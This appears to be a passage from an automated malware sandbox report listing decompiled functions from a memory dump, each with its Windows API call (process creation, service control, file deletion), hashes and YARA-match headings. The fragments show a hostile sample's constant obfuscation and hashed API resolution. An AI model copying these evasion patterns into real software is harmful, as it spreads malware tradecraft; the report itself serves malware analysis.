                                                      • API ID: ManagerOpen
                                                      • String ID: <^
                                                      • API String ID: 1889721586-3203995635
                                                      • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                                      • Instruction ID: 0d90814f6e3e98dddc946965e93f2e1c0a25011b10019f6726629396f8a684e9
                                                      • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                                      • Instruction Fuzzy Hash: 6A016D72A00108BFEB14DF95DC0A9DFBFB6EF44310F108089F508A6250D7B69F619B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E006CC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                      				signed int _v8;
                                                      				unsigned int _v12;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				intOrPtr _v28;
                                                      				void* _t29;
                                                      				intOrPtr* _t33;
                                                      				void* _t34;
                                                      
                                                      				E006C602B(_t29);
                                                      				_v28 = 0x4fe02f;
                                                      				_v24 = 0x232390;
                                                      				_v20 = 0xf8460;
                                                      				_v16 = 0;
                                                      				_v12 = 0xf625;
                                                      				_v12 = _v12 >> 6;
                                                      				_v12 = _v12 >> 0xa;
                                                      				_v12 = _v12 + 0xffffcc6f;
                                                      				_v12 = _v12 ^ 0xffffa5b6;
                                                      				_v8 = 0xe5cd;
                                                      				_v8 = _v8 + 0xffffae4d;
                                                      				_v8 = _v8 | 0xf8bbefe7;
                                                      				_v8 = _v8 ^ 0xf8bbcc9a;
                                                      				_t33 = E006D07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
                                                      				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
                                                      				return _t34;
                                                      			}













                                                      APIs
                                                      • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 006CC762
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2117427965.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                      • Associated: 0000000C.00000002.2117418822.00000000006C0000.00000004.00000001.sdmp
                                                      • Associated: 0000000C.00000002.2117456048.00000000006DC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FolderPath
                                                      • String ID: /O
                                                      • API String ID: 1514166925-1923427199
                                                      • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                                      • Instruction ID: 7e0c757dfb255f1e9486b82fffa48cea1d3adc185dba1f33bdcace53b76a2b62
                                                      • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                                      • Instruction Fuzzy Hash: 391133B290122DBBCB25DF94DD498EFBFB9EF04714F108188F90966210D3B14B659BE0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E006C1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				void* _t33;
                                                      				struct HINSTANCE__* _t40;
                                                      				signed int _t42;
                                                      
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				E006C602B(_t33);
                                                      				_v16 = _v16 & 0x00000000;
                                                      				_v24 = 0x1b2eda;
                                                      				_v20 = 0x33a3b7;
                                                      				_v12 = 0x98c;
                                                      				_v12 = _v12 + 0xb426;
                                                      				_v12 = _v12 + 0x5beb;
                                                      				_t42 = 0x63;
                                                      				_v12 = _v12 / _t42;
                                                      				_v12 = _v12 ^ 0x00000fce;
                                                      				_v8 = 0x120e;
                                                      				_v8 = _v8 + 0xfffffcb8;
                                                      				_v8 = _v8 + 0xffffefaa;
                                                      				_v8 = _v8 >> 5;
                                                      				_v8 = _v8 ^ 0x07ff9a02;
                                                      				E006D07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
                                                      				_t40 = LoadLibraryW(_a12); // executed
                                                      				return _t40;
                                                      			}












                                                      APIs
                                                      • LoadLibraryW.KERNEL32(0033A3B7), ref: 006C1096
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2117427965.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                      • Associated: 0000000C.00000002.2117418822.00000000006C0000.00000004.00000001.sdmp
                                                      • Associated: 0000000C.00000002.2117456048.00000000006DC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID: [
                                                      • API String ID: 1029625771-3431493590
                                                      • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                                      • Instruction ID: 595082948c127377ca9c24a2aaf2efaa831d8029a0979ed7cd247bea10029107
                                                      • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                                      • Instruction Fuzzy Hash: C2015BB6D01309BBEF44DF94C94AADEBBB1EB54318F108188E41466291D3B19B649B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E006C4859() {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t22;
                                                      
                                                      				_v12 = 0xafe2;
                                                      				_v12 = _v12 * 0x42;
                                                      				_v12 = _v12 + 0xffffdd89;
                                                      				_v12 = _v12 ^ 0x002d198d;
                                                      				_v8 = 0x5b09;
                                                      				_v8 = _v8 | 0xa1ea9544;
                                                      				_v8 = _v8 * 0x12;
                                                      				_v8 = _v8 ^ 0x6283d9c1;
                                                      				E006D07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
                                                      				ExitProcess(0);
                                                      			}







                                                      APIs
                                                      • ExitProcess.KERNELBASE(00000000), ref: 006C48B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2117427965.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                      • Associated: 0000000C.00000002.2117418822.00000000006C0000.00000004.00000001.sdmp
                                                      • Associated: 0000000C.00000002.2117456048.00000000006DC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID: [
                                                      • API String ID: 621844428-1822564810
                                                      • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                                      • Instruction ID: f977ee72c49a2ce788bd0dd8ccf2a57d70dd6a84fe47d661be0c35e563bf7402
                                                      • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                                      • Instruction Fuzzy Hash: 66F01D70D05209FBDB44CFE8C95699EBFB5EB40301F20818DE444B7290E3B15F509B54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 66%
                                                      			E006D4F7D(void* __ecx, void* __edx, void* _a4) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t17;
                                                      				int _t24;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E006C602B(_t17);
                                                      				_v12 = 0xddd8;
                                                      				_v12 = _v12 * 0x48;
                                                      				_v12 = _v12 ^ 0x003e66d8;
                                                      				_v8 = 0xcb35;
                                                      				_v8 = _v8 ^ 0x7b88573c;
                                                      				_v8 = _v8 * 0x59;
                                                      				_v8 = _v8 ^ 0xf27e4a21;
                                                      				E006D07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
                                                      				_t24 = CloseHandle(_a4); // executed
                                                      				return _t24;
                                                      			}








                                                      APIs
                                                      • CloseHandle.KERNELBASE(003E66D8), ref: 006D4FE2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2117427965.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                      • Associated: 0000000C.00000002.2117418822.00000000006C0000.00000004.00000001.sdmp
                                                      • Associated: 0000000C.00000002.2117456048.00000000006DC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID: {#lm
                                                      • API String ID: 2962429428-1564096886
                                                      • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                                      • Instruction ID: dc35befc03082ea648cf0aa4494a33d20af433371597595b82786401f99a50a2
                                                      • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                                      • Instruction Fuzzy Hash: 3BF037B0C1120CFFEB04DFA4DA4689EBFBAEB40300F20819DE808BB250D3715B509B54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 21%
                                                      			E006D976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				void* _t34;
                                                      				int _t39;
                                                      				struct _PROCESS_INFORMATION* _t48;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_t48 = __edx;
                                                      				_push(0);
                                                      				_push(_a68);
                                                      				_push(0);
                                                      				_push(_a60);
                                                      				_push(_a56);
                                                      				_push(_a52);
                                                      				_push(0);
                                                      				_push(_a44);
                                                      				_push(_a40);
                                                      				_push(0);
                                                      				_push(0);
                                                      				_push(_a28);
                                                      				_push(_a24);
                                                      				_push(_a20);
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(__ecx);
                                                      				E006C602B(_t34);
                                                      				_v12 = 0xaff9;
                                                      				_v12 = _v12 | 0xcee54bd1;
                                                      				_v12 = _v12 + 0x6ed6;
                                                      				_v12 = _v12 ^ 0xcee61221;
                                                      				_v8 = 0x6229;
                                                      				_v8 = _v8 ^ 0x42aa9f31;
                                                      				_v8 = _v8 >> 2;
                                                      				_v8 = _v8 ^ 0x10aad83f;
                                                      				E006D07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
                                                      				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
                                                      				return _t39;
                                                      			}









                                                      APIs
                                                      • CreateProcessW.KERNEL32(006C591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,006C591A), ref: 006D9816
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2117427965.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                      • Associated: 0000000C.00000002.2117418822.00000000006C0000.00000004.00000001.sdmp
                                                      • Associated: 0000000C.00000002.2117456048.00000000006DC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                                      • Instruction ID: 3f8e90123bad8e9db8c238fbfb71a36c04cb31a8b2b8d6f9f018623c35058772
                                                      • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                                      • Instruction Fuzzy Hash: 3011D372900148BBDF599F92DC0ACDF7F3AEF89750F104048FA1456120D2728A60EBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 31%
                                                      			E006CB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				void* _t32;
                                                      				void* _t38;
                                                      				long _t47;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a48);
                                                      				_t47 = __edx;
                                                      				_push(_a44);
                                                      				_push(_a40);
                                                      				_push(_a36);
                                                      				_push(_a32);
                                                      				_push(_a28);
                                                      				_push(_a24);
                                                      				_push(0);
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(0);
                                                      				E006C602B(_t32);
                                                      				_v8 = 0xfd14;
                                                      				_v8 = _v8 >> 4;
                                                      				_v8 = _v8 * 0x7a;
                                                      				_v8 = _v8 >> 9;
                                                      				_v8 = _v8 ^ 0x00002bef;
                                                      				_v12 = 0x4f26;
                                                      				_v12 = _v12 | 0xe7e97f76;
                                                      				_v12 = _v12 ^ 0xe7e94dbb;
                                                      				E006D07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
                                                      				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
                                                      				return _t38;
                                                      			}









                                                      APIs
                                                      • CreateFileW.KERNELBASE(006D0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,006D0668,?,?,?,?), ref: 006CB5FD
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2117427965.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                      • Associated: 0000000C.00000002.2117418822.00000000006C0000.00000004.00000001.sdmp
                                                      • Associated: 0000000C.00000002.2117456048.00000000006DC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                                      • Instruction ID: 4dfd29d2e95c8a81270e188d170eef02627936aac4c261a76deba25f80d2271c
                                                      • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                                      • Instruction Fuzzy Hash: 8E11C372801248BBDF56DF95DD06CEE7F7AFF89314F148198FA1862120D3729A20EB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 54%
                                                      			E006D981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t22;
                                                      				void* _t28;
                                                      				void* _t34;
                                                      				long _t37;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a16);
                                                      				_t34 = __edx;
                                                      				_t37 = __ecx;
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(__ecx);
                                                      				E006C602B(_t22);
                                                      				_v12 = 0xe68;
                                                      				_v12 = _v12 * 0x39;
                                                      				_v12 = _v12 ^ 0xd1b1d871;
                                                      				_v12 = _v12 ^ 0xd1b2fb7e;
                                                      				_v8 = 0x629e;
                                                      				_v8 = _v8 + 0xfffff5da;
                                                      				_v8 = _v8 | 0xbef7b77b;
                                                      				_v8 = _v8 ^ 0xbef79fc3;
                                                      				E006D07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
                                                      				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
                                                      				return _t28;
                                                      			}










                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,006C87F2,0000CAAE,0000510C,AD82F196), ref: 006D989B
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2117427965.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                      • Associated: 0000000C.00000002.2117418822.00000000006C0000.00000004.00000001.sdmp
                                                      • Associated: 0000000C.00000002.2117456048.00000000006DC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                                      • Instruction ID: bd96d7fd845bcf9acbec375f88614873cfd5b079acd079bb1ab1d14eab653b18
                                                      • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                                      • Instruction Fuzzy Hash: 98019A72801208FBDB04EFD5D846CDFBF79EF85310F10818DF908A6220E6719B219BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 62%
                                                      			E006D7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t24;
                                                      				int _t31;
                                                      				signed int _t33;
                                                      				struct _SHFILEOPSTRUCTW* _t40;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a12);
                                                      				_t40 = __ecx;
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E006C602B(_t24);
                                                      				_v8 = 0xa117;
                                                      				_t33 = 0x76;
                                                      				_v8 = _v8 / _t33;
                                                      				_v8 = _v8 >> 4;
                                                      				_v8 = _v8 ^ 0x210fe703;
                                                      				_v8 = _v8 ^ 0x210fdcea;
                                                      				_v12 = 0xf1e9;
                                                      				_v12 = _v12 << 9;
                                                      				_v12 = _v12 ^ 0x01e3a445;
                                                      				E006D07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
                                                      				_t31 = SHFileOperationW(_t40); // executed
                                                      				return _t31;
                                                      			}










                                                      APIs
                                                      • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 006D7C67
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2117427965.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                      • Associated: 0000000C.00000002.2117418822.00000000006C0000.00000004.00000001.sdmp
                                                      • Associated: 0000000C.00000002.2117456048.00000000006DC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileOperation
                                                      • String ID:
                                                      • API String ID: 3080627654-0
                                                      • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                                      • Instruction ID: 265b839422b40c41ae9c4a18b9b8809066ca68da7193d2a8cd01760036c7e771
                                                      • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                                      • Instruction Fuzzy Hash: BC014FB190120CFFEB49DF94C94A9DE7BB5EF44314F20819DF40567240E6B15F509B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 52%
                                                      			E006CF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				void* _t24;
                                                      				void* _t29;
                                                      				int _t35;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a20);
                                                      				_t35 = __ecx;
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E006C602B(_t24);
                                                      				_v12 = 0xd5a7;
                                                      				_v12 = _v12 ^ 0x994cba9d;
                                                      				_v12 = _v12 ^ 0x994c19d3;
                                                      				_v8 = 0xac88;
                                                      				_v8 = _v8 << 3;
                                                      				_v8 = _v8 >> 8;
                                                      				_v8 = _v8 + 0xebed;
                                                      				_v8 = _v8 ^ 0x0000ab82;
                                                      				E006D07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
                                                      				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
                                                      				return _t29;
                                                      			}









                                                      APIs
                                                      • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 006CF6D8
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2117427965.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                      • Associated: 0000000C.00000002.2117418822.00000000006C0000.00000004.00000001.sdmp
                                                      • Associated: 0000000C.00000002.2117456048.00000000006DC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: OpenService
                                                      • String ID:
                                                      • API String ID: 3098006287-0
                                                      • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                                      • Instruction ID: e5ce28f777ee97fcbb0f40c328e02666741496e654b79fdf1bfef53b5c485528
                                                      • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                                      • Instruction Fuzzy Hash: 2201E5B6901208BBEF059F94DD0A8DF7F75EB05324F148188F90466250D6B25E21DBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E006CB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                      				signed int _v8;
                                                      				unsigned int _v12;
                                                      				void* _t23;
                                                      				intOrPtr* _t27;
                                                      				void* _t28;
                                                      
                                                      				E006C602B(_t23);
                                                      				_v12 = 0x9431;
                                                      				_v12 = _v12 >> 7;
                                                      				_v12 = _v12 ^ 0x0000160f;
                                                      				_v8 = 0xc972;
                                                      				_v8 = _v8 ^ 0x829e0126;
                                                      				_v8 = _v8 + 0x4512;
                                                      				_v8 = _v8 + 0xffff18f9;
                                                      				_v8 = _v8 ^ 0x829e24c1;
                                                      				_t27 = E006D07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
                                                      				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
                                                      				return _t28;
                                                      			}









                                                      APIs
                                                      • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 006CB759
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2117427965.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                      • Associated: 0000000C.00000002.2117418822.00000000006C0000.00000004.00000001.sdmp
                                                      • Associated: 0000000C.00000002.2117456048.00000000006DC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileHandleInformation
                                                      • String ID:
                                                      • API String ID: 3935143524-0
                                                      • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                                      • Instruction ID: b12ae957d101f7aa69163a32ec028809930ad8a978d3accd7e31397482b4cded
                                                      • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                                      • Instruction Fuzzy Hash: A6014FB594130CFBEF45DF94DD06E9E7BB5EF14704F108188FA0966190D3B15E209B55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E006DAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                                      				signed int _v8;
                                                      				unsigned int _v12;
                                                      				void* _t21;
                                                      				int _t27;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E006C602B(_t21);
                                                      				_v12 = 0xcc49;
                                                      				_v12 = _v12 << 6;
                                                      				_v12 = _v12 >> 2;
                                                      				_v12 = _v12 ^ 0x000ca988;
                                                      				_v8 = 0x5d85;
                                                      				_v8 = _v8 | 0xb9d19a55;
                                                      				_v8 = _v8 * 0xd;
                                                      				_v8 = _v8 ^ 0x6fa87272;
                                                      				E006D07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
                                                      				_t27 = DeleteFileW(_a12); // executed
                                                      				return _t27;
                                                      			}








                                                      APIs
                                                      • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 006DAAA8
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2117427965.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                      • Associated: 0000000C.00000002.2117418822.00000000006C0000.00000004.00000001.sdmp
                                                      • Associated: 0000000C.00000002.2117456048.00000000006DC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteFile
                                                      • String ID:
                                                      • API String ID: 4033686569-0
                                                      • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                                      • Instruction ID: 663a755dfc6d45a7fbd065eb061e0d929363b67b5f9ec4174fd994159a9be1ad
                                                      • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                                      • Instruction Fuzzy Hash: 46F0F6B590020CFFDB08DF94D94A99EBBB5EB45304F10819CF915A6250D2B69B549B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 70%
                                                      			E006C5FB2(void* __ecx, void* __edx, void* _a4) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t21;
                                                      				int _t27;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E006C602B(_t21);
                                                      				_v12 = 0x33d;
                                                      				_v12 = _v12 + 0xc3dc;
                                                      				_v12 = _v12 | 0x39ccfb02;
                                                      				_v12 = _v12 ^ 0x39ccf342;
                                                      				_v8 = 0xe8d9;
                                                      				_v8 = _v8 * 0x16;
                                                      				_v8 = _v8 | 0x4145347f;
                                                      				_v8 = _v8 ^ 0x9035ef96;
                                                      				_v8 = _v8 ^ 0xd1609914;
                                                      				E006D07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
                                                      				_t27 = CloseServiceHandle(_a4); // executed
                                                      				return _t27;
                                                      			}








                                                      APIs
                                                      • CloseServiceHandle.ADVAPI32(39CCF342), ref: 006C6025
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2117427965.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                      • Associated: 0000000C.00000002.2117418822.00000000006C0000.00000004.00000001.sdmp
                                                      • Associated: 0000000C.00000002.2117456048.00000000006DC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandleService
                                                      • String ID:
                                                      • API String ID: 1725840886-0
                                                      • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                                      • Instruction ID: cb0861d6890d54ac7204ff8d6eb82e3182e3e738c333d00b41e92a2462ccbc2b
                                                      • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                                      • Instruction Fuzzy Hash: CCF04FB0D11208FFEB48DFA0E94689EBFB9EB40300F20819CE409A7260E7B19F159F54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Executed Functions

                                                      C-Code - Quality: 62%
                                                      			E001E2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				void* _t30;
                                                      				void* _t39;
                                                      				signed int _t41;
                                                      				signed int _t42;
                                                      
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(0);
                                                      				_push(0);
                                                      				E001E602B(_t30);
                                                      				_v12 = 0x5e3c;
                                                      				_t41 = 0x63;
                                                      				_v12 = _v12 / _t41;
                                                      				_t42 = 0x2f;
                                                      				_v12 = _v12 / _t42;
                                                      				_v12 = _v12 ^ 0x000064be;
                                                      				_v8 = 0x74da;
                                                      				_v8 = _v8 | 0xfefeeaea;
                                                      				_v8 = _v8 >> 0xc;
                                                      				_v8 = _v8 ^ 0x000fb531;
                                                      				E001F07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
                                                      				_t39 = OpenSCManagerW(0, 0, _a16); // executed
                                                      				return _t39;
                                                      			}










                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 001E29DC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2118908713.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 0000000D.00000002.2118891780.00000000001E0000.00000004.00000001.sdmp
                                                      • Associated: 0000000D.00000002.2118954046.00000000001FC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ManagerOpen
                                                      • String ID: <^
                                                      • API String ID: 1889721586-3203995635
                                                      • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                                      • Instruction ID: f29e54dee73b85a96df9d17acf58ceeec97b552066db9f924e08f68ae3473b75
